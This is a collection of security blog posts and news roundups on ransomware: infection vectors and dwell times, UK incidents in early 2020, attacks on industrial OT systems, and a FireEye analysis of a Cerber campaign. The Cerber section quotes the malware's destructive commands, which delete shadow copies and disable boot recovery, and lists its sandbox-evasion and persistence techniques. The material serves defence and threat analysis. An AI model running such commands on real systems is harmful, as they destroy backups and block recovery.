        We noted several initial infection vectors across multiple ransomware incidents, including RDP, phishing with a malicious link or attachment, and drive by download of malware facilitating follow-on activity. RDP was more frequently observed in 2017 and declined in 2018 and 2019. These vectors demonstrate that ransomware can enter victim environments by a variety of means, not all of which require user interaction.

        RDP or other remote access

        One of the most frequently observed vectors was an attacker logging on to a system in a victim environment via Remote Desktop Protocol (RDP). In some cases, the attacker brute forced the credentials (many failed authentication attempts followed by a successful one). In other cases, a successful RDP log on was the first evidence of malicious activity prior to a ransomware infection. It is possible that the targeted system used default or weak credentials, the attackers acquired valid credentials via other unobserved malicious activity, or the attackers purchased RDP access established by another threat actor. In April 2019, we noted that FIN6 used stolen credentials and RDP to move laterally in cases resulting in ransomware deployment.

        Phishing with link or attachment

        A significant number of ransomware cases were linked to phishing campaigns delivering some of the most prolific malware families in financially motivated operations: TRICKBOT, EMOTET, and FLAWEDAMMYY. In January 2019, we described TEMP.MixMaster TrickBot infections that resulted in interactive deployment of Ryuk.

        Drive-by-download

        Several ransomware infections were traced back to a user in the victim environment navigating to a compromised website that resulted in a DRIDEX infection. In October 2019, we documented compromised web infrastructure delivering FAKEUPDATES, then DRIDEX, and ultimately BITPAYMER or DOPPELPAYMER infections.

        Most Ransomware Deployments Take Place Three or More Days After Initial Infection

        The number of days elapsed between the first evidence of malicious activity and the deployment of ransomware ranged from zero to 299 days (Figure 2). That is, dwell times range quite widely, and in most cases, there was a time gap between first access and ransomware deployment. For 75 percent of incidents, at least three days passed between the first evidence of malicious activity and ransomware deployment.

        This pattern suggests that for many organizations, if initial infections are detected, contained, and remediated quickly, the significant damage and cost associated with a ransomware infection could be avoided. In fact, in a handful of cases, Mandiant incident responders and FireEye Managed Defense contained and remediated malicious activity, likely preventing ransomware deployment. Several investigations discovered evidence of ransomware installed into victim environments but not yet successfully executed.


        Figure 2: Days elapsed between initial access and ransomware deployment

        Ransomware Deployed Most Often After Hours

        In 76% of incidents we reviewed, ransomware was executed in victim environments after hours, that is, on a weekend or before 8:00 a.m. or after 6:00 p.m. on a weekday, using the time zone and customary work week of the victim organization (Figure 3 and Figure 4). This observation underscores that threat actors continue working even when most employees may not be.

        Some attackers possibly intentionally deploy ransomware after hours, on weekends, or during holidays, to maximize the potential effectiveness of the operation on the assumption that any remediation efforts will be implemented more slowly than they would be during normal work hours. In other cases, attackers linked ransomware deployment to user actions. For example, in 2019 incidents at retail and professional services firms, attackers created an Active Directory Group Policy Object to trigger ransomware execution based on user log on and log off.


        Figure 3: Ransomware execution frequently takes place after hours


        Figure 4: Ransomware execution by hour of the day

        Mitigation Recommendations

        Organizations seeking to prevent or mitigate the effects of ransomware infections could consider the following steps. For more comprehensive recommendations for addressing ransomware, please refer to our blog post: Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment and the linked white paper.

        Address Infection Vectors

        • Use enterprise network, email, and host-based security products with up-to-date detections to prevent and detect many common malware strains such as TRICKBOT, DRIDEX, and EMOTET.
        • Contain and remediate infections quickly to prevent attackers from conducting follow-on activity or selling access to other threat actors for further exploitation.
        • Perform regular network perimeter and firewall rule audits to identify any systems that have inadvertently been left accessible to the internet. Disable RDP and other protocols to systems where this access is not expressly required. Enable multi-factor authentication where possible, particularly to internet-accessible connections, see pages 4-15 of the white paper for more details.
        • Enforce multi-factor authentication, that is, where enabled, do not allow single factor authentication for users who have not set up the multi-factor mechanism.

        Implement Best Practices

        • For example, carry out regular anti-phishing training for all employees that operate a device on the company network. Ensure employees are aware of threat, their role in preventing it, and the potential cost of a successful infection.
        • Implement network segmentation when possible to prevent a potential infection from spreading.
        • Create regular backups of critical data necessary to ensure business continuity and, if possible, store them offsite, as attackers often target backups.
        • Restrict Local Administrator accounts from specific log on types, see page 18 of the white paper for more details.
        • Use a solution such as LAPS to generate a unique Local Administrator password for each system.
        • Disallow cleartext passwords to be stored in memory in order to prevent Mimikatz credential harvesting, see p. 20 of the white paper for more details.
        • Consider cyber insurance that covers ransomware infection.

        Establish Emergency Plans

        • Ensure that after-hours coverage is available to respond within a set time period in the case of an emergency.
        • Institute after-hours emergency escalation plans that include redundant means to contact multiple stakeholders within the organization and 24-hour emergency contact information for any relevant third-party vendors.

        Outlook

        Ransomware is disruptive and costly. Threat actor innovations have only increased the potential damage of ransomware infections in recent years, and this trend shows no sign of slowing down. We expect that financially motivated actors will continue to evolve their tactics to maximize profit generated from ransomware infections. We anticipate that post-compromise ransomware infections will continue to rise and that attackers will increasingly couple ransomware deployment with other tactics, such as data theft and extortion, increasing ransom demands, and targeting critical systems.

        The good news is that particularly with post-compromise infections, there is often a window of time between the first malicious action and ransomware deployment. If network defenders can detect and remediate the initial compromise quickly, it is possible to avoid the significant damage and cost of a ransomware infection.

        Register for our upcoming ransomware webinar to learn more.

        Cyber Security Roundup for March 2020

        A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, February 2020.

        Redcar and Cleveland Borough Council became the latest UK organisation to become the victim of a mass ransomware attack which started on 8th February.  The north-east Council's servers, PCs, mobile devices, websites and even phone lines have been down for three weeks at the time of writing. A Redcar and Cleveland councillor told the Guardian it would take several months to recover and the cost is expected to between £11m and £18m to repair the damage done. A significant sum for the cash-strapped council, which confirmed their outage as ransomware caused 19 days after the attack. The strain of ransomware involved and the method initial infiltration into the council's IT systems has yet to be confirmed.


        The English FA shut down its investigation into allegations Liverpool employees hacked into Manchester City's scouting system. The Manchester club also made news headlines after UEFA banned it from European competition for two years, a ban based on alleged stolen internal email evidence obtained by a hacker.  Read The Billion Pound Manchester City Hack for further details.

        The UK government said GRU (Russian military intelligence) was behind a massive cyber-attack which knocked out more than 2,000 websites in the country of Georgia last year, in "attempt to undermine Georgia's sovereignty". Foreign Secretary Dominic Raab described it as "totally unacceptable".

        The United States deputy assistant secretary for cyber and communications, Robert Strayer, said he did not believe the UK government's January 2020 decision to allow Huawei limited access to UK's 5G infrastructure was final. 'Our understanding is that there might have been some initial decisions made but conversations are continuing," he told the BBC. Read The UK Government Huawei Dilemma and the Brexit Factor for more on UK government's Huawei political, economic and security debate.

        Following Freedom of Information requests made by Viasat, it reported UK government employees had either lost or stolen 2,004 mobiles and laptops between June 2018 and June 2019.

        According to figures by the FBI, cybercriminals netted £2.7bn ($3.5bn) from cyber-crimes report 2019, with phishing and extortion remaining the most common method of scamming people. These FBI reported cybercrime losses have tripled over the past 5 years. The FBI concluded that cyber scam techniques are becoming more sophisticated, making it harder for original people to tell "real from fake".  A new Kaspersky report backs up the FBI, finding a 9.5% growth in financial phishing during the final quarter of 2019.

        The Labour party is facing data protection fines of up £15m for failing to protect their members' personal data. The Information Commissioner's Office confirmed the Labour Party would be the focus of their investigation since it is legally responsible for securing members' information as the "data controller".

        This month's cloud misconfiguration breach award goes to french sports retail giant Decathlon, after 123 million customer records were found to be exposed by researchers at vpnMentor .  Leaked data included employee usernames, unencrypted passwords and personally identifiable information (PII) including social security numbers, full names, addresses, mobile phone numbers, addresses and birth dates. “The leaked Decathlon Spain database contains a veritable treasure trove of employee data and more. It has everything that a malicious hacker would, in theory, need to use to take over accounts and gain access to private and even proprietary information,” said vpnMentor.

        If you have a 'Ring' smart camera doorbell (IoT) device then may have noticed Two-Factor Authentication (2FA) was mandated in February.  Ring's stance of enforcing a strengthening of security may be related to several recent high-profile home camera hack reports.
        Ring: An IoT device's security improved by mandated 2FA

        The facial recognition company Clearview AI advised a hacker stole its client list database. The firm works with law enforcement agencies and gained notoriety after admitting it had scrapped billions of individuals photos off the internet.

        BLOG
        NEWS
        VULNERABILITIES AND SECURITY UPDATESAWARENESS, EDUCATION AND THREAT INTELLIGENCE

        Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

        Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

        While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

        Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

        Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

        The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

        In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which  expand the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


        Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

        Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

        • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
        • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
        • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

        Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

        An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

        In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


        Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

        Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.

        Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

        As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

        The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

        Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

        As recently as February 2020, the Cybersecurity Infrastructure and Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shut down of operations that lasted two days.

        Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

        Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

        For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

        • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
        • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
        • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
        • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
        • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
        • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
        • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
        • Note, that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.

        Cyber Security Roundup for February 2020

        A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, January 2020.

        After years of dither and delay the UK government finally nailed its colours to the mast, no not Brexit but Huawei, permitting 'limited use' of the Chinese Telecoms giant's network appliances within the UK's new 5G infrastructure. Whether this is a good decision depends more on individual political persuasion than national security interest, so just like Brexit the general view on the decision is binary, either its a clever compromise or a complete sell out of UK national security. I personally believe the decision is more about national economics than national security, as I previously blogged in 'The UK Government Huawei Dilemma and the Brexit Factor'. The UK government is playing a delicate balancing to safeguard potentially massive trade deals with both of the world's largest economic superpowers, China and United States. An outright US style ban Huawei would seriously jeopardise billions of pounds worth of Chinese investment into the UK economy. While on the security front, Huawei's role will be restricted to protect the UK's critical national infrastructure, with Huawei's equipment banned from use within the core of the 5G infrastructure. The UK National Cyber Security Centre (NCSC) published a document which provides guidance to high risk network providers on the use of Huawei tech.
        UK Gov agrees to 'limited' Huawei involvement within UK 5G

        UK business targeted ransomware continues to rear its ugly head in 2020, this time global foreign exchange firm Travelex's operations were all brought to a shuddering halt after a major ransomware attack took down Travelex's IT systems. Travelex services impacted included their UK business, international websites, mobile apps, and white-labelled services for the likes of Tesco, Sainsburys, Virgin Money, Barclays and RBS. The ransomware in question was named as Sodinokibi, with numerous media reports strongly suggesting the Sodinokibi ransomware infiltrated the Travelex network through unpatched vulnerable Pulse Secure VPN servers, which the National Cyber Security Centre had apparently previously detected and warned Travelex about many months earlier. Could be some truth in this, given the Sodinokibi ransomware is known to infect through remote access systems, including vulnerable Pulse Secure VPN servers. The cybercriminal group behind the attack, also known as Sodin and REvil, demanded £4.6 million in ransom payment, and had also claimed to have taken 5Gb of Travelex customer data. Travelex reported no customer data had been breached, however, its money exchange services remained offline for well over two weeks after reporting the incident, with the firm advising it expected most of its travel exchange services to be back operational by the end of January.

        The same Sodinokibi criminal group behind the Travelex attack also claimed responsibility for what was described by German automotive parts supplier Gedia Automotive Group, as a 'massive cyber attack'. Gedia said it would take weeks to months before its IT systems were up and running as normal. According to analysis by US cyber security firm Bad Packets, the German firm also had an unpatched Pulse Secure VPN server on its network perimeter which left it exposed to the ransomware attack. Gedia patched their server VPN on 4th January.

        Leeds based medical tech company Tissue Regenix halted its US manufacturing operation after unauthorised party accessed its IT systems. To date there hasn't been any details about the nature of this cyber attack, but a manufacturing shutdown is a hallmark of a mass ransomware infection. Reuters reported shares in the company dropped 22% following their cyber attack disclosure.

        London based marine consultancy company LOC was hacked and held to be ransom by cybercriminals. It was reported computers were 'locked' and 300Gb of company data were stolen by a criminal group, investigations on this hack are still ongoing.

        Its seem every month I report a massive data breach due to the misconfiguration of a cloud server, but I never expected one of leading global cloud providers, Microsoft, to be caught out by such a school boy error. Microsoft reported a database misconfiguration of their Elasticsearch servers exposed 250 million customer support records between 5th and 19th December 2019. Some of the non-redacted data exposed included customer email addresses; IP addresses; locations; descriptions of customer support claims and cases; Microsoft support agent emails; case numbers, resolutions and remarks; and confidential internal notes. It is not known if any unauthorised parties had accessed any of the leaked data.

        Cyber attacks against the UK defence industry hit unprecedented highs according government documentation obtained by Sky News. Sky News revealed the MoD and its partners failed to protect military and defence data in 37 incidents in 2017 and 34 incidents in first 10 months of 2018, with military data exposed to nation-level cyber actors on dozens of occasions.

        It was another fairly busy month for Microsoft patches, including an NSA revealed critical flaw in Windows 10. January also saw the end of security updates support for Windows 7 and Windows Server 2008, unless you pay Microsoft extra for extended support.

        According to a World Economic Forum (WEF) study, most of the world's airports cybersecurity is not up to scratch. WEF reported 97 of the world’s 100 largest airports have vulnerable web and mobile applications, misconfigured public cloud and dark web leaks. Findings summary were:

        • 97% of the websites contain outdated web software.
        • 24% of the websites contain known and exploitable vulnerabilities.
        • 76% and 73% of the websites are not compliant with GDPR and PCI DSS, respectively.
        • 100% of the mobile apps contain at least five external software frameworks.
        • 100% of the mobile apps contain at least two vulnerabilities.
        Elsewhere in the world, it was reported a US Department of Defence contractor had its web servers (and thus its websites) taken down by the Ryuk ransomware. Houston-based steakhouse Landry advised it was hit by a point-of-sale malware attack which stole customer payment card data. Stolen customer payment card data taken from a Pennsylvania-based convenience store and petrol station operator was found for sale online. Ahead of the Superbowl LIV Twitter and Facebook accounts for 15 NFL teams were hacked. The hacking group OurMine took responsibility for the NFL franchise attacks, which said it was to demonstrate internet security was "still low" and had to be improved upon. Sonos apologised after accidentally revealing hundreds of customer email addresses to each other. And a ransomware took a US Maritime base offline for 30 hours.

        Dallas County Attorney finally applied some common-sense, dropping charges against two Coalfire Red Teamers. The two Coalfire employees had been arrested on 11th September 2019 while conducting a physical penetration test of the Dallas County courthouse. The Perry News quoted a police report which said upon arrest the two men stated, “they were contracted to break into the building for Iowa courts to check the security of the building". After the charges were dropped at the end of January Coalfire CEO Tom McAndrew said, 'With positive lessons learned, a new dialogue now begins with a focus on improving best practices and elevating the alignment between security professionals and law enforcement”. Adding “We’re grateful to the global security community for their support throughout this experience.”


        BLOG
        NEWS
        VULNERABILITIES AND SECURITY UPDATES
        AWARENESS, EDUCATION AND THREAT INTELLIGENCE

        Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

        Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

        On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

        Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

        FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

        Attack Process

        The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

        1. Target receives and opens a Word document.
        2. Macro in document is invoked to run PowerShell in hidden mode.
        3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
        4. On successful connection, the ransomware is written to the disk of the victim.
        5. PowerShell executes the ransomware.
        6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
        7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
        8. Files are encrypted and messages are presented to the user requesting payment.

        Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

        The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

        PowerShell Abuse

        When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

        Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

        It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

        In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

        Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

        Cerber in Action

        Initial payload behavior

        Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

        If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

        Shadow deletion

        As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

        Vssadmin.exe "delete shadows /all /quiet"

        WMIC.exe "shadowcopy delete"

        Bcdedit.exe "/set {default} recoveryenabled no"

        Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures

        Coercion

        People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

        Figure 2. A message to the victim after encryption

        The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

         

         

        Figure 3. Ransom offered to victim, which is discounted for five days

        Multilingual Support

        As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

        Figure 4.   Interface provided to the victim to pay ransom supports 12 languages

        Encryption

        Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

        Selective Targeting

        Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

        The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

        Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

        Anti VM Checks

        The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

        Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

        Persistence

        Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

        • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
        • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
        • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
        • Common persistence methods such as run and runonce key are also used.
        A Solid Defense

        Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

        Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

        Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

        FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

        Conclusion

        Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

        Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

